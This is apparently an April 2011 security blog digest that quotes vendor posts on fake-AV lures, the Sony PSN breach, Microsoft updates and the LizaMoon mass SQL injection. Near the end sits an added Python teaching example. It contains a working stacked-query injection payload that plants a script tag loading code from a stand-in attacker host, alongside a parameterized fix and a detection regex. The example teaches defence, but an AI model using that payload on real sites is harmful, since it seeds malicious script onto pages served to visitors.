April 2011 - Posts
Mobile phone security is becoming more critical, and ESET (a leading security and AV firm) has just released a beta version of its Android product, as noted below.
ESET - Android Mobile Security product
QUOTE: As I have blogged about the Android platform a recurring comment has been “When will ESET have protection for my Android?” Well, I still don’t know when it will be available for sale, but for those who understand the risks involved with running beta software, have backed up all of their data on their Android devices and want to give it a spin, you can download the beta at
Also at that site is a link to provide feedback and bug reports! By the way, for those of you like me who have a CDMA device (Verizon, Sprint, etc.) the SIM features do not work exactly right yet.
Major news stories like the Royal Wedding are often used to trick users into clicking links that download malware. Please be careful with anything you click.
President Obama Birth Certificate and FAKEAV attacks
QUOTE: You probably saw that whole "Obama birth certificate" thing yesterday. You're also aware this means hunting around for pictures of his birth certificate is going to result in Rogue AV files popping up. Big news stories will always result in a wave of Rogue AV in both regular search and image links, so be careful where you click (as much as you possibly can, at any rate).
A workaround has been published for this false positive affecting SAP connectivity software.
McAfee Virus Scan DAT 6329 False Positive
QUOTE: McAfee Labs have issued an alert that McAfee VirusScan DAT file 6329 is returning a false positive for spsgui.exe. This is impacting SAP telephone connectivity functionality.
McAfee have a workaround for the issue documented in KB71739.
Microsoft released a special Malicious Software Removal Tool update on Tuesday to better eradicate the Afcore botnet. This is described below:
MSRT - Second release during April 2011 to fight Afcore botnet
QUOTE: The 4th Tuesday of the month is also a Patch Tuesday, though lesser-known. Microsoft issues non-security updates on almost every 4th Tuesday of the month, but this month has a surprise addition: An extra edition of the Malicious Software Removal Tool. The updates released today fix a variety of problems and Microsoft is, as typical, vague about them. One addresses application compatibility problems; two are "reliability updates"; and two more "resolve issues" in Windows.
The last update is the MSRT. Microsoft always releases an MSRT on the first Patch Tuesday of the month, but this may be the first time they have released a second. This version is part of an ongoing effort to take down the Afcore botnet. Win32/Afcore's authors released new variants at about the time of the last MSRT release 2 weeks ago. The new MSRT also includes updates for other malware families.
Sony is currently evaluating its PSN services to determine the scope of a recent security breach by an unauthorized party.
SONY PSN Service Outage
SONY PSN Blog to track future developments
SONY PSN Service Outage FAQ
QUOTE: Sony takes information protection very seriously and will continue to work to ensure that additional measures are taken to protect personally identifiable information. Providing quality and secure entertainment services to our customers is our utmost priority. Please check www.eu.playstation.com/psnoutage should you have any additional questions.
Trend Micro reports on a spam run that lures users into downloading a fake "Facebook Messenger" application, which is actually a backdoor. Please avoid this attack and be careful with any link or application presented to you in this social networking environment.
Facebook Events, Credits, and Passwords Being Used for Attacks
QUOTE: Facebook has expanded its range of service offerings, making the site so much more than a place where users can interact with one another. It has been said several times that Facebook is bound to replace email as a means of communication, as it provides a more convenient way for users to send messages. This convenience, however, was also leveraged by cybercriminals in a recent spam run wherein users were urged to download an application called Facebook Messenger. This would supposedly make it easier for them to access messages sent to their Facebook accounts.
The attack starts with spammed messages that look like a Facebook notification. The email message alerts the users about a message that has been sent to their Facebook accounts. It tells the users to click a link to view the said message. Clicking the message, however, displays a download page for an application called Facebook Messenger.
The downloaded file named FacebookMessengerSetup.exe is malicious and detected as BKDR_QUEJOB.EVL. BKDR_QUEJOB.EVL opens TCP port 1098 to listen for commands sent by a malicious attacker. The nature of the commands may include updating the malicious file, downloading and executing other malicious files, and starting certain processes. It also queries the system for information such as installed antivirus products and OS version then sends the data it gathers to a certain SMTP.
Trend Micro documents that DLL-based FAKEAV attacks are circulating in the wild again, and that systems infected this way are challenging to clean.
Fourth Generation FAKEAV DLL Based attacks return in the wild
QUOTE: One of the early generations listed in the paper can be recalled as the DLL-based FAKEAV (4th Generation) — a FAKEAV group that uses a DLL file to perform all the malicious routines, primarily to avoid being terminated easily. A few months ago, however, we saw this particular generation again making its rounds in the wild, one of which we detect as TROJ_FAKEAV.BTV.
Trend Micro - Research report on FAKEAV Threat
Sunbelt documents that a fake blog site themed around the Royal Wedding is actively pushing fake AV malware.
Fake Blog for Kate Middleton offers Fake AV malware
QUOTE: When she isn't waving at babies, mingling with the commoners or appearing on Tumblrs she likes to set down some thoughts on her blog. She also wants you to check out her movie clip. Unfortunately, this movie clip can't be viewed unless you update your version of Flash. Alarm bells ringing yet? I'm not entirely convinced legit installs of Adobe Flash Player come from this inappropriate site, but in the mad dash to see some rich people larking about with money you'll actually end up with AntiVirus AntiSpyware 2011 on your computer.
Microsoft recently updated its procedures for submitting suspicious files for evaluation, as follows:
Microsoft - How to submit suspicious malware entries
QUOTE: When you suspect that a file or a program is malicious, you can send the file to the Microsoft Research and Response team for analysis. Malicious files or programs (malware) may include viruses, spyware, worms, and adware. You can use one of the following methods to send malware files to Microsoft for analysis:
* Web-based submission
* Submission by Microsoft Customer Support Services
* Prompted Submission
SQL injection is a class of attack in which user-supplied input that is not validated or parameterized by the application is interpreted by the database as part of a query. On a vulnerable site an attacker can use this to write content of their own into the database, for example a script tag appended to every text field, which is then served to visitors so that they are silently redirected to other malicious websites. Corporations can address this with tools that identify vulnerable sites, and by having their developers strengthen input handling (parameterized queries and output encoding) to prevent automated attacks and the seeding of malware.
SQL Injection Attacks - Corporate Need to address weaknesses
QUOTE: SQL injection vulnerabilities have really been around for ages – the first reference I can remember of was Rain Forest Puppy’s article for Phrack 54 “NT Web Technology Vulnerabilities” that was published back in 1998 (yes – SQL injection is almost 13 years old!). However, as we can see from the examples that happened recently (and from many other cases – just take a look at the mass SQL injection attacks that are performed automatically by malware these days) SQL injection vulnerabilities are unfortunately here to stay.
So are the bad guys any better? Unfortunately, the answer is YES. When I get my hands on them, I always try to analyze the server-side scripts that the bad guys use – these are usually scripts running on their C&C servers that help them control infected machines, issue and schedule tasks and so on. So, if the bad guys can do it, we should be better too – so please use a couple of minutes to educate your developers about the dangers of writing insecure code.
eWeek speculates on 10 reasons Windows 8 may provide improvements over Windows 7
Ten reasons Windows 8 may provide improvements
QUOTE: Windows 8 is just around the corner, and rumors are swirling about the upcoming operating system and what it will feature when it’s likely released next year. Although details are relatively slim for now, one thing is for certain: Windows 8 will be even better than Windows 7.
Ten possible reasons Windows 8 may provide improvements
1. It improves upon a nice operating system.
2. The security keeps improving.
3. The ARM compatibility is key.
4. An application store, perhaps?
5. Instant-on is what’s needed.
6. It might be more suitable for tablets.
7. Better power consumption
8. What’s with History Vault? (possible improvement to System Restore)
9. A better interface
10. Microsoft’s lesson learned
A new security update for Microsoft Silverlight is available. Please update your system, if you have this installed.
Microsoft Silverlight Update - April 2011
QUOTE: Microsoft has issued a security patch for Silverlight KB2526954. It fixes six issues. If you have Microsoft update running, it is ready to install. This is rated as important and will auto install.
Description of the update for Microsoft Silverlight
Microsoft Silverlight Direct download (6MB)
Sunbelt has issued warnings related to Easter cards and Royal Wedding links, as noted below. Please be careful with anything you click, as one wrong click can mean hours of repair work.
Royal Wedding and Easter Cards used in Fake AV attacks
QUOTE: The Royal Wedding is going to spring into action on the 29th April, and Fake AV scans are starting to show up in relation to the "Big Day". As a result, you might want to think twice before looking for jellybeans bearing the visage of Kate Middleton or strange turnips that look a bit like the future King of England when held at the right angle. The culprit here is our search engine "friend" from this entry regarding Easter card searches. Rummaging around for Royal Wedding sites will start off well enough, with a collection of normal looking search engine results.
Security experts noted a sudden and unexplained drop in activity for this 8-year-old Internet worm during March, but unfortunately the lull was only temporary.
SQL Slammer Worm - Activity increases in April
QUOTE: At McAfee Labs every day we monitor millions of intrusion prevention systems (IPS) alerts from our sensors around the world. From these alerts, we often see interesting global data and trends. Recently, ISC noticed a sudden decline of Slammer traffic in the wild, which we also noticed on our sensors.
The infamous Slammer was a rapid-spreading worm that started on January 25, 2003. It targeted Microsoft SQL Server, and the worm traveled over UDP on port 1434, which contributes to its rapid spread. It is incredibly noisy, and it really never went away, even though the worm is eight years old!
To our surprise, the amount of traffic that we detect dropped significantly in early March, and we do not yet know the reason for the decline. What we have noticed, however, was that alerts for Slammer started to reappear early this month.
Users should avoid e-commerce or banking transactions on a smartphone where possible. Smartphone software should be kept up to date as security patches emerge. Also, be careful with every application you request and install, as malicious applications are circulating.
Mobile Phone Security - Advice from a Professional Hacker
QUOTE: Smart phones make it so easy to do many daily tasks -- from checking e-mail to shopping to banking. But they also make you easy prey for scammers and identity thieves. "It is very difficult to have any protection on your phone," says Dave Aitel, whose company creates penetration testing products (i.e. hacking tools). The company, Immunity, developed a tool that can easily hack into Google Android phones, Aitel says. To be clear, it was created to test mobile security, not to be sold to people who want to tap into others' phones. Nonetheless, the tool shows how vulnerable these phones are to hackers.
Please be careful, as several security firms are warning users about email and web searches related to this upcoming event.
Royal Wedding spam, scams, and malware
QUOTE: One of the most common ways to propagate malware through social engineering is to piggyback it on some attention-catching news event. This can be carried out using a variety of techniques and is certainly nothing new. One infamous example from 2007 was Win32/Nuwar (a/k/a the Storm Worm), which was distributed through spam emails with current and/or sensational subjects.
Another one which is current these days is the upcoming British royal wedding. When searching keywords relating to this event (e.g., "middleton wedding dress idea") in your search engine, malicious links are among the top results. And the category of malware which sits behind them hardly comes as a surprise – rogue anti-virus apps.
The Patch Tuesday updates installed successfully on both work PCs and no issues have been discovered in early testing. This is a large group of updates (76MB) including Office 2010 and Framework. These updates take several minutes to update. The Framework update is lengthy and may even seem to hang, so users should be patient. It will probably take about 20-30 minutes to install and a reboot should be performed as prompted so that all changes become properly effective.
Microsoft Security Bulletins - April 2011
ISC provides an excellent summary (two bulletins are rated PATCH NOW)
The LizaMoon attack continues to infect thousands of vulnerable websites. While some technical articles have published alarming statistics that overstate the total number of infections, the attack continues to spread, and users should exercise caution with web search results, Facebook links, and email links.
LizaMoon Mass SQL Injection Attack Escalates Out of Control
LizaMoon - Excellent update and FAQ
QUOTE: The LizaMoon mass-injection campaign is still ongoing and more than 500,000 pages have a script link to lizamoon.com according to preliminary Google Search results. We have also been able to identify several other URLs that are injected in the exact same way, so the attack is even bigger than we originally thought. All in all, a search on Google returns more than 1,500,000 results that have a link with the same URL structure as the initial attack.
What's the deal with the Lizamoon SQL injection?
QUOTE: The script that is loaded from the compromised web pages redirects the user to a malicious site. Ultimately, the attack is intended to infect users with fake AV (scareware). The distribution sites used typically use the ".cc" (Cocos Islands) or ".in" (India) TLDs. This frightening volume may be a little misleading, since the total is inflated by occurrences of the following HTML within the compromised web pages. As you can see, the injected code has been escaped in some cases, rendering the injection harmless.
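The following script is an added example, not code from either of the quoted posts or from the LizaMoon write-ups. It ties the SQL injection post above and the LizaMoon FAQ together: a page-view counter that splices user input into its UPDATE lets a stacked-query payload append a script tag to every row of a content table (the mass-injection pattern), the parameterized version of the same handler is immune, and HTML-escaping on output renders an injected tag harmless, which is the "escaped in some cases" observation in the FAQ. The `articles` table, the `count_view_*` handlers, the payload and the host `attacker.example` are all constructed for the example; Python's `sqlite3.executescript` stands in for a database server that accepts batched statements.

```python
import html
import re
import sqlite3

# Hypothetical attacker host. The page names lizamoon.com; this stand-in is constructed
# so the example stays offline and makes no claim about the real campaign's URLs.
SCRIPT_TAG = '<script src="http://attacker.example/"></script>'

# Stacked-query payload submitted as the "title" field of a page-view counter. The first
# quote closes the intended string, a second UPDATE appends the script tag to every row,
# and the trailing "SELECT '" absorbs the quote the original statement ends with, so the
# whole batch parses cleanly without needing a SQL comment.
PAYLOAD = "x'; UPDATE articles SET body = body || '" + SCRIPT_TAG + "'; SELECT '"


def fresh_db():
    """Constructed sample content table standing in for a site's CMS database."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, body TEXT,"
        " views INTEGER DEFAULT 0);"
        "INSERT INTO articles (title, body) VALUES ('Royal Wedding', 'Plain text about the day.');"
        "INSERT INTO articles (title, body) VALUES ('Easter cards', 'Another harmless page.');"
    )
    return conn


def count_view_vulnerable(conn, title):
    # Bug: user-controlled text is spliced into the statement. executescript() runs every
    # statement in the string, emulating a server that accepts batched queries, so the
    # attacker's second UPDATE runs with the application's own database privileges.
    conn.executescript("UPDATE articles SET views = views + 1 WHERE title = '" + title + "'")


def count_view_hardened(conn, title):
    # Fix: a bound parameter. The payload is compared as a literal title value; it can
    # never terminate the statement or start a new one.
    conn.execute("UPDATE articles SET views = views + 1 WHERE title = ?", (title,))


def bodies(conn):
    """Current body text of every article, in id order."""
    return [row[0] for row in conn.execute("SELECT body FROM articles ORDER BY id")]


# An unescaped external script tag: "<script ... src=http(s)://...".
SCRIPT_LINK = re.compile(r"""<script\b[^>]*\bsrc\s*=\s*["']?https?://""", re.IGNORECASE)


def render_unescaped(body):
    # Database text dropped straight into the page: an injected tag becomes live.
    return "<p>" + body + "</p>"


def render_escaped(body):
    # HTML-escaping on output turns "<script" into "&lt;script", so even a successful
    # injection is displayed as text rather than executed by the visitor's browser.
    return "<p>" + html.escape(body) + "</p>"


def has_live_script_link(page_html):
    """True when the rendered page contains an unescaped external <script src=...> tag."""
    return SCRIPT_LINK.search(page_html) is not None


if __name__ == "__main__":
    conn = fresh_db()
    count_view_vulnerable(conn, PAYLOAD)
    hit = bodies(conn)
    print("vulnerable handler, rows now carrying the tag:",
          sum(SCRIPT_TAG in b for b in hit), "of", len(hit))
    print("raw render executes the tag:", has_live_script_link(render_unescaped(hit[0])))
    print("escaped render executes the tag:", has_live_script_link(render_escaped(hit[0])))
    conn = fresh_db()
    count_view_hardened(conn, PAYLOAD)
    print("hardened handler, rows carrying the tag:",
          sum(SCRIPT_TAG in b for b in bodies(conn)))
```

Note that `render_escaped` only neutralizes the symptom; the rows are still corrupted and the site is still injectable. Parameterized queries close the hole, output encoding limits the blast radius, and a scan of stored content with a check like `has_live_script_link` is a cheap way to find pages that have already been seeded.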
It appears that multiple botnets were affected by the recent raid that shut down Rustock, a botnet which impacted over 1 million users.
Harnig botnet was also shut down along with Rustock
QUOTE: Rustock is not the only botnet that has stopped operations. The Harnig botnet, also known as Piptea, also went offline at about the same time. On the very day that law enforcement authorities, with Microsoft’s help, were raiding Rustock’s command-and-control servers, the servers belonging to the Harnig botnet–also known as Piptea–stopped responding, according to Atif Mushtaq, a security research engineer at FireEye. Rustock used to be spread by Harnig, suggesting some kind of a relationship between the two botnets, Mushtaq wrote on the company’s Malware Intelligence Lab March 22.
Facebook recently started allowing secure connections, and its HTTPS-based controls are gradually improving.
Facebook - HTTPS based security improvements
QUOTE: There's been some encouraging progress since then, and this is now what happens when a non-HTTPS application is accessed. So at least the setting is persistent. Hopefully the feature will be more dynamic in the near future. If you have a Facebook account, and want to update your settings for HTTPS, you'll find the option under Account Security.